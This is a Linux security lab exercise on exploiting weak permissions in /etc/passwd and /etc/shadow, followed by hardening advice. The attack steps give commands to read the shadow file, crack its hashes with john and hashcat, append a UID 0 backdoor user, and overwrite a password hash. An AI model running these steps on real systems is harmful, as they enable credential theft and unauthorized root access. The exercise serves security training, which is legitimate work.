Exercise 15: Exploiting Misconfigured /etc/passwd or /etc/shadow

Objective: Learn how to exploit misconfigurations in the /etc/passwd and /etc/shadow files to gain unauthorized access and understand best practices for securing these files.

Scenario: The /etc/passwd and /etc/shadow files store essential information about user accounts and their authentication data. Misconfigurations, such as empty passwords or improper permissions, can allow attackers to gain unauthorized access or escalate privileges. Your task is to identify such vulnerabilities, exploit them, and secure these files to prevent abuse.

Lab Setup

1. Environment:
   • A Linux system with potentially misconfigured /etc/passwd or /etc/shadow files.
2. Tools Required:
   • john or hashcat for password cracking.
   • Text editor (e.g., vim, nano) with root privileges.

Lab Steps

Step 1: Inspect Permissions and Content of /etc/passwd and /etc/shadow

Check the permissions of the files:

ls -l /etc/passwd /etc/shadow

Correct permissions:

-rw-r--r-- 1 root root /etc/passwd 
-r-------- 1 root shadow /etc/shadow

If writable by non-root users, the files are vulnerable.

Inspect /etc/passwd for misconfigured entries:

cat /etc/passwd

Look for accounts with an empty password field (e.g., ::):

testuser::1001:1001::/home/testuser:/bin/bash

Inspect /etc/shadow for weak or empty password hashes:

sudo cat /etc/shadow

Example weak entry:

testuser:$6$randomsalt$hashedpassword:18446:0:99999:7:::

Step 2: Crack Passwords Using john or hashcat

Extract password hashes from /etc/shadow:

sudo cat /etc/shadow | grep testuser > hashes.txt

Use john to crack the password:

john --wordlist=/path/to/wordlist.txt hashes.txt

Monitor the output for cracked passwords.

Alternatively, use hashcat:

hashcat -m 1800 -a 0 hashes.txt /path/to/wordlist.txt

Replace -m 1800 with the appropriate mode for the hash type.

Step 3: Modify /etc/passwd or /etc/shadow

Add a New Root User to /etc/passwd:

Append the following entry to /etc/passwd:

rootuser:x:0:0:root:/root:/bin/bash

This creates a new user (rootuser) with root privileges.

Change the Password for an Existing User:

Generate a new password hash:

openssl passwd -6 newpassword

Replace the hash in /etc/shadow for the user:

testuser:$6$newhashedpassword:18446:0:99999:7:::

Step 4: Gain Unauthorized Access

Switch to the compromised user account:

su testuser

Verify access and privileges: whoami

Solution

Explanation:

• The /etc/passwd file stores user account information, while /etc/shadow stores encrypted password hashes. Improper permissions or configurations can allow attackers to read or modify these files, leading to privilege escalation.

Prevention:

Enforce Secure Permissions:

Set proper permissions on /etc/passwd and /etc/shadow:

chmod 644 /etc/passwd 
chmod 400 /etc/shadow

Audit User Accounts:

Regularly check for empty password fields or unnecessary accounts:

sudo cat /etc/passwd | grep '::'

Implement Strong Password Policies:

Use tools like pam_pwquality to enforce password complexity.

Configure /etc/security/pwquality.conf with rules for minimum length, character classes, and reuse prevention.

Monitor and Log Changes:

Use tools like auditd to log access and modifications to /etc/passwd and /etc/shadow.

Testing and Verification

1. Re-check permissions and configurations of /etc/passwd and /etc/shadow.
2. Attempt to read or modify the files without root privileges to confirm they are secured.
3. Test user accounts to ensure passwords meet complexity requirements and are functional.

Reflection

This exercise demonstrates the critical importance of securing /etc/passwd and /etc/shadow files. By identifying and exploiting misconfigurations, you’ve gained insights into protecting these essential files to prevent unauthorized access and privilege escalation.